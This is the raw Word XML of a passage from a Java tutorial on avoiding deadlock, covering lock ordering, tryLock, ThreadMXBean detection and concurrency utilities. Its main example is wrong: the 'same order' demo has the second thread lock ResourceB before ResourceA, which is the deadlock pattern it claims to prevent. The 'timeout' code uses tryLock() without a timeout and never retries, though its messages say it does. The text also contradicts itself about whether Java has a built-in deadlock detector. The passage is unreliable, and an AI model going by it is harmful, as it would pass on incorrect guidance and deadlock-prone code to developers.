    </w:p>
    <w:p w14:paraId="7D192467"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One of the most effective ways to prevent deadlock is to establish a strict order in which resources are acquired. All threads should acquire resources in the same order. If thread 1 locks </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resource A</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resource B</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, then thread 2 should also acquire </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resource A</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> before </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resource B</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4896887E"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FF1407"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class ResourceA {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B02A9B"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synchronized void methodA(ResourceB b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5F62E3"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Thread 1: locked ResourceA");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C616B7E"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        b.last();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5065901F"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6356DCD0" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1661F274"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synchronized void last() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469F0C47"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Inside ResourceA last");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA6EC36"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44C0CD73"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33969BF4" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E9BE0D"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class ResourceB {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292CCD78"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synchronized void methodB(ResourceA a) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D338C8"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Thread 2: locked ResourceB");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60360F5F"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a.last();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F88AA1"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1DEAF12C" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5932DEAE"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synchronized void last() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F958DCF"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Inside ResourceB last");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776DF472"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5047A6BC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D454BC" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C3935A"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public class AvoidDeadlockExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F8C27C"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5649B9E8"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final ResourceA resourceA = new ResourceA();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656DCF39"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final ResourceB resourceB = new ResourceB();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B3A4A9" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C0B0E6"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Thread 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694F48A9"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hread t1 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A364D2"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nchronized (resourceA) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145F9592"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Thread 1: locked ResourceA");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F9CE3E"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nchronized (resourceB) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5769EFF2"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resourceB.methodB(resourceA);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16270570"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72084A17"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430F3B3B"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3A602F69" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="170794FB"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Thread 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EB1FC0"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hread t2 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2DD5EE"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nchronized (resourceB) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C74C262"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Thread 2: locked ResourceB");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565208E9"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nchronized (resourceA) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242CAE49"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resourceA.methodA(resourceB);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6126DF9D"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2B5D739C"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3B28FEE4"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2EC734CA" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B40F98F"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1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B2A40F"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2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4CCDBC"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237D698F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4758A3"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By acquiring the resources in the same order, deadlock is avoided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552015D8" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00000000" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3F28DA5F">
          <v:rect id="_x0000_i1835" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF2D4E3" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D"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2. Lock Timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DDE500"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Another way to avoid deadlock is to attempt to acquire the lock with a timeout. If a thread cannot acquire a lock within a specified time, it can back off and release the resources it has already acquired, thus preventing a deadlock situation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA7175A"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You can use </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ReentrantLock</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (instead of synchronized) to set a timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1437B62F"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import java.util.concurrent.locks.Lock;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3854DE6D"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lastRenderedPageBreak/>
        <w:t>import java.util.concurrent.locks.ReentrantLock;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE5BBAA" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5D27D9"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public class DeadlockTimeoutExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CE876C" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="782E2108"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rivate static final Lock lockA = new ReentrantLock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB63834"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rivate static final Lock lockB = new ReentrantLock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1596E5F4" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59008AEB"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DE4BF1"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hread t1 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F14059C"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E282032"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if (lockA.tryLock() &amp;&amp; lockB.tryLock()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0467CE92"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Thread 1: acquired both locks");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6C778E"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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6533451F"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Thread 1: could not acquire both locks, retrying");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEF9B7D"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552CF375"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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3884C2D2"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if (lockA.isHeldByCurrentThread()) lockA.unlock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5832BAAB"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if (lockB.isHeldByCurrentThread()) lockB.unlock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D301DCB"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29F3CF43"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09630101" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362A37AA"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hread t2 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA6465C"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E5E37A"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if (lockB.tryLock() &amp;&amp; lockA.tryLock()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54B808"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Thread 2: acquired both locks");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C24D64A"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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D7E04"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Thread 2: could not acquire both locks, retrying");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1854F0"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667F7432"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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4299896A"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if (lockA.isHeldByCurrentThread()) lockA.unlock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17398CE3"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if (lockB.isHeldByCurrentThread()) lockB.unlock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DEB117"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1B3C83EB"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7B9D8990" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B3462E"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1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29985011"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2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53447198"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03C6B0C2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7877C276"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Here, the threads try to acquire the locks with tryLock(), and if they can't acquire both, they will back off and retry. This avoids deadlock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256C2DB8" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00000000" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="1D4E3F83">
          <v:rect id="_x0000_i1836" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4222A145" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D"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3. Deadlock Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45919B19"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Another approach to avoid deadlock is to detect deadlocks and take corrective action. For example, you can periodically check if any threads are waiting for resources and interrupt them. Java doesn't provide a built-in deadlock detector, but you can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ThreadMXBean</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the java.lang.management package to detect deadlocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7EF69"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import java.lang.management.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA88D7A" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C483E62"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public class DeadlockDetection {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8E3739"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE98F33"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ThreadMXBean threadMXBean = ManagementFactory.getThreadMXBean();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67277D5A"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7100E020"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Get the list of threads that are deadlocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A3242F"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long[] deadlockedThreads = threadMXBean.findDeadlockedThreads();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B002F5"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if (deadlockedThreads != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056E295B"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for (long threadId : deadlockedThreads) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E352BF2"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                System.out.println("Deadlocked Thread ID: " + threadId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E3E358"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29956755"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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AA02D7"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System.out.println("No deadlocked threads found.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3BDF94"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6FFCF2B3"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F7B73C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3D5C87"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This method can help you detect deadlocks during runtime and take corrective actions like restarting threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1377D1" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00000000" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="5DE745A0">
          <v:rect id="_x0000_i1837" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E85F6C" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D"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4. Using Higher-Level Concurrency Utilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA18B8D"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 xml:space="preserve">Java provides higher-level concurrency utilities (like </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CountDownLatch</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CyclicBarrier</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Semaphore</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) which are designed to avoid the complexity of manual lock management and reduce the risk of deadlocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6273677A"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By using these tools, you can simplify the thread synchronization model and avoid situations that may lead to deadlocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0055A990" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00000000" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="0C66FE71">
          <v:rect id="_x0000_i1838" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71569E8D" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230D6BA1" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deadlock is a serious issue in multithreading, but it can be avoided by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E6D0A2" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensuring a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consistent lock order</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
